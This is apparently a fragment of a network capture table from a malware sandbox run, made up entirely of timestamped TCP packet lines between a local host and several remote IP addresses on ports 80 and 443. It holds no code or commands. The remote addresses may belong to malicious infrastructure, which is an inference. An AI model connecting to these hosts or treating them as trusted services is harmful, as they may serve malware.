                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594702005 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594724894 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594733953 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594767094 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594824076 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594830036 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594840050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594845057 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594877005 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594893932 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594898939 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594938040 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594984055 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.594989061 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595000029 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595026970 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595061064 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595067024 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595072031 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595076084 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595108032 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595129967 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595134974 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595139980 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595149994 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595174074 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595237970 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595242977 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595252991 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595257998 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595263004 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595279932 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595303059 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595359087 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595364094 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595369101 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595374107 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595396042 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595419884 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595428944 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595460892 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595470905 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595475912 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595480919 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595496893 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595525026 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595616102 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595621109 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595630884 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595635891 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595640898 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595650911 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595659971 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595678091 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595699072 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595813036 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595815897 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595818996 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595829010 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595834017 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595840931 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595845938 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595853090 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595860004 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595864058 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595885038 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595904112 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595976114 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595980883 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595985889 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.595992088 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596010923 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596036911 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596148968 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596153975 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596163988 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596168995 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596174955 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596184969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596189976 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596190929 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596195936 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596218109 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596235037 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596395016 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596400023 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596410036 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596414089 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596420050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596430063 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596435070 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596437931 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596440077 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596450090 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596455097 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596460104 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596470118 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596474886 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596493959 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596515894 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596632957 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596637011 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596647024 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596652985 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596673965 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.596690893 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.751422882 CEST49713443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.751461029 CEST44349713172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.751513004 CEST49713443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.751844883 CEST49713443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.751857042 CEST44349713172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:51.437807083 CEST44349713172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:51.491679907 CEST49713443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:51.492244959 CEST49713443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:51.492258072 CEST44349713172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:51.588406086 CEST44349713172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:51.589781046 CEST49713443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:51.589801073 CEST44349713172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:51.871625900 CEST44349713172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:51.871697903 CEST44349713172.67.140.92192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:51.871756077 CEST49713443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:51.872345924 CEST49713443192.168.2.6172.67.140.92
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.189434052 CEST4971480192.168.2.641.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.194361925 CEST804971441.216.188.190192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.194462061 CEST4971480192.168.2.641.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.194612980 CEST4971480192.168.2.641.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.199465036 CEST804971441.216.188.190192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.901479959 CEST804971441.216.188.190192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.945374966 CEST4971480192.168.2.641.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.999900103 CEST49715443192.168.2.6173.231.16.77
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.999959946 CEST44349715173.231.16.77192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.000047922 CEST49715443192.168.2.6173.231.16.77
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.001244068 CEST49715443192.168.2.6173.231.16.77
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.001262903 CEST44349715173.231.16.77192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.607739925 CEST44349715173.231.16.77192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.607853889 CEST49715443192.168.2.6173.231.16.77
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.609395027 CEST49715443192.168.2.6173.231.16.77
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.609406948 CEST44349715173.231.16.77192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.609643936 CEST44349715173.231.16.77192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.652467966 CEST49715443192.168.2.6173.231.16.77
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.695405006 CEST44349715173.231.16.77192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.826513052 CEST44349715173.231.16.77192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.826581955 CEST44349715173.231.16.77192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.826651096 CEST49715443192.168.2.6173.231.16.77
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.829606056 CEST49715443192.168.2.6173.231.16.77
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.829639912 CEST44349715173.231.16.77192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.829657078 CEST49715443192.168.2.6173.231.16.77
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.829663992 CEST44349715173.231.16.77192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.839823008 CEST49716443192.168.2.634.117.59.81
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.839862108 CEST4434971634.117.59.81192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.839941025 CEST49716443192.168.2.634.117.59.81
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.840255976 CEST49716443192.168.2.634.117.59.81
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:54.840267897 CEST4434971634.117.59.81192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.332616091 CEST4434971634.117.59.81192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.332686901 CEST49716443192.168.2.634.117.59.81
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.334057093 CEST49716443192.168.2.634.117.59.81
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.334079981 CEST4434971634.117.59.81192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.334295988 CEST4434971634.117.59.81192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.335274935 CEST49716443192.168.2.634.117.59.81
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.379410028 CEST4434971634.117.59.81192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.465631962 CEST4434971634.117.59.81192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.465730906 CEST4434971634.117.59.81192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.465790033 CEST49716443192.168.2.634.117.59.81
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.465986967 CEST49716443192.168.2.634.117.59.81
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.466010094 CEST4434971634.117.59.81192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.466021061 CEST49716443192.168.2.634.117.59.81
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:55.466027021 CEST4434971634.117.59.81192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:57.458441973 CEST4971480192.168.2.641.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:57.458441973 CEST4971480192.168.2.641.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:57.463459015 CEST804971441.216.188.190192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:57.463506937 CEST804971441.216.188.190192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:58.648610115 CEST804971441.216.188.190192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:58.694834948 CEST4971480192.168.2.641.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:58.769567966 CEST4971480192.168.2.641.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:58.769610882 CEST4971480192.168.2.641.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:58.774632931 CEST804971441.216.188.190192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:58.774663925 CEST804971441.216.188.190192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.049180984 CEST804971441.216.188.190192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.101363897 CEST4971480192.168.2.641.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.585154057 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.585154057 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.590058088 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.590073109 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.590154886 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.590770006 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.590770960 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.590821028 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.595761061 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.595774889 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.224318981 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.224538088 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.226046085 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.230890036 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.269768000 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.269815922 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.270184994 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.274949074 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409511089 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409579039 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409629107 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409630060 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409630060 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409658909 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409666061 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409693956 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409696102 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409728050 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409759045 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409759998 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409776926 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409791946 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409800053 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409823895 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409828901 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409857035 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409867048 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409894943 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409934044 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.414875984 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.414925098 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.458924055 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.458966970 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.458993912 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459018946 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459034920 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459072113 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459078074 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459120989 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459141970 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459156036 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459161043 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459171057 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459184885 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459189892 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459199905 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459203959 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459213018 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459233046 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459259987 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.464255095 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.464307070 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.464354038 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501379013 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501435995 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501456976 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501470089 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501477003 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501502991 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501554966 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501642942 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501701117 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501729012 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501761913 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501796007 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501801014 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501828909 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.501869917 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.502552032 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.502604961 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.502619982 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.502655029 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.502688885 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.502698898 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.502722025 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.502764940 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.503374100 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.503437996 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.503447056 CEST8049725147.45.44.104192.168.2.6
